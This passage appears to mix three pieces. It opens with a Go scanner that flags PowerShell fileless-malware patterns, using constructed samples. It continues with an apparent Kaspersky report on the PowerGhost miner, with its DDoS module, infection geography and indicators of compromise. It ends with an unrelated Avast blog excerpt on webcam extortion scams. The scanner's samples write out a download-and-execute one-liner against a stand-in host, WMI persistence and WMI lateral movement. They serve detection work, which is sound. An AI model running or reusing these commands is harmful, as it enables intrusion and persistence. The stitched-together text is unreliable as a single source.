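			`|\b(downloadstring|downloaddata)\b[\s\S]*?\b(iex|invoke-expression)\b`)},
	// Add-on modules (miner, mimikatz, DLLs, exploit shellcode) shipped as base64.
	{"embedded base64 payload", regexp.MustCompile(`(?i)FromBase64String\(`)},
	// Foothold: modules stored in WMI, body re-launched by a WMI subscription.
	{"WMI event-subscription persistence", regexp.MustCompile(
		`(?i)(__EventFilter|CommandLineEventConsumer|__FilterToConsumerBinding|Register-WmiEvent|root[\\/]subscription)`)},
	// Lateral movement: spawn a copy on another host through WMI process creation.
	{"remote process creation via WMI", regexp.MustCompile(
		`(?i)(Invoke-WmiMethod|Get-WmiObject|Get-CimInstance|Invoke-CimMethod)[^\n]*win32_process[^\n]*create`)},
	// Payload: PE mapped into memory instead of executed from disk (heuristic).
	{"reflective PE injection", regexp.MustCompile(`(?i)(VirtualAlloc|WriteProcessMemory|CreateRemoteThread)`)},
}

// Scan runs every finding over one script block and returns the names that hit.
func Scan(scriptBlock string) []string {
	var hits []string
	for _, f := range findings {
		if f.Pattern.MatchString(scriptBlock) {
			hits = append(hits, f.Name)
		}
	}
	return hits
}

// Score is a crude triage aid: the stage-0 one-liner alone is worth escalating;
// combined with persistence or lateral movement it is the full PowerGhost pattern.
func Score(hits []string) string {
	set := make(map[string]bool, len(hits))
	for _, h := range hits {
		set[h] = true
	}
	switch {
	case set["in-memory download-and-execute"] &&
		(set["WMI event-subscription persistence"] || set["remote process creation via WMI"]):
		return "critical"
	case set["in-memory download-and-execute"] || set["WMI event-subscription persistence"]:
		return "high"
	case len(hits) > 0:
		return "medium"
	}
	return "none"
}

// Constructed sample script blocks; none were captured from a real infection.
var samples = map[string]string{
	"stage0":  `IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')`,
	"persist": `$f = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name='Updater';Query="SELECT * FROM __InstanceModificationEvent WITHIN 5400 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";QueryLanguage='WQL';EventNamespace='root\cimv2'}
$c = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='Updater';CommandLineTemplate="powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')"}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$f;Consumer=$c}`,
	"lateral": `Invoke-WmiMethod -ComputerName $target -Credential $cred -Class Win32_Process -Name Create -ArgumentList $oneLiner`,
	"benign":  `Get-ChildItem -Path C:\Logs -Filter *.log | Measure-Object`,
}

func main() {
	for name, block := range samples {
		hits := Scan(block)
		fmt.Printf("%-8s %-9s %s\n", name, Score(hits), strings.Join(hits, ", "))
	}
}
```

The persistence sample uses a 5400-second (90-minute) polling filter to mirror the interval described above; on a real host the equivalent hunt is to enumerate __EventFilter, CommandLineEventConsumer and __FilterToConsumerBinding instances in root\subscription and treat any consumer whose command line launches PowerShell with a download primitive as suspect.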

In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers apparently decided to make some extra money by offering DDoS services.

PowerShell function with the tell-tale name RunDDOS

It’s worth pointing out that this is the only one of the miner’s functions that writes files to the hard drive. It is quite possibly a test tool that will later be replaced with a fileless implementation. The peculiar way the DDoS module is launched also suggests that this function was added to this version as an afterthought: the script downloads two PE modules, logos.png and cohernece.txt. The former is saved to the hard drive as java-log-9527.log and is the executable that conducts the DDoS attacks. The file cohernece.txt is protected with the software protection tool Themida, complete with a check for execution in a virtual environment. If the check does not detect a sandbox, cohernece.txt launches java-log-9527.log. In this roundabout way, a ready-made DDoS module was given a virtual-environment check.

Fragment of disassembled code of the file cohernece.txt

Statistics and geography

Corporate users bore the brunt of the attack: it’s easier for PowerGhost to spread within a company’s local area network.

Geography of infections by the miner

PowerGhost is encountered most often in India, Brazil, Colombia and Turkey.

Kaspersky Lab’s products detect the miner and/or its components with the following verdicts:

  • PDM:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen

Wallet addresses used by the miner:

  • 43QbHsAj4kHY5WdWr75qxXHarxTNQDk2ABoiXM6yFaVPW6TyUJehRoBVUfEhKPNP4n3JFu2H3PNU2Sg3ZMK85tPXMzTbHkb
  • 49kWWHdZd5NFHXveGPPAnX8irX7grcNLHN2anNKhBAinVFLd26n8gX2EisdakRV6h1HkXaa1YJ7iz3AHtJNK5MD93z6tV9H

Indicators of compromise

C&C hosts:

  • 7h4uk[.]com
  • 128.43.62

Sample hashes (MD5):

  • AEEB46A88C9A37FA54CA2B64AE17F248
  • 4FE2DE6FBB278E56C23E90432F21F6C8
  • 71404815F6A0171A29DE46846E78A079
  • 81E214A4120A4017809F5E7713B7EAC8

Securelist - Kaspersky Lab’s cyberthreat research and reports

Blog | Avast EN: Scam alert! Don’t fall for this webcam extortion ploy | Avast

A titillating new scam has hit the scene, but don’t let it work you up. It hits you with a one-two punch of first showing that it knows your password, then telling you a compromising video exists (taken with your own webcam) of you watching porn. The scammer threatens to send the video to everyone in your contacts if you don’t make a bitcoin payment to the provided address. In the examples we’ve seen, the amount requested ranges from $1900 to $7000 (and it could be more). To further the discomfort, the scammer adds that the video has been rendered in a split-screen format that shows the actual XXX clip you were watching alongside your real-time reactions to it.

Blog | Avast EN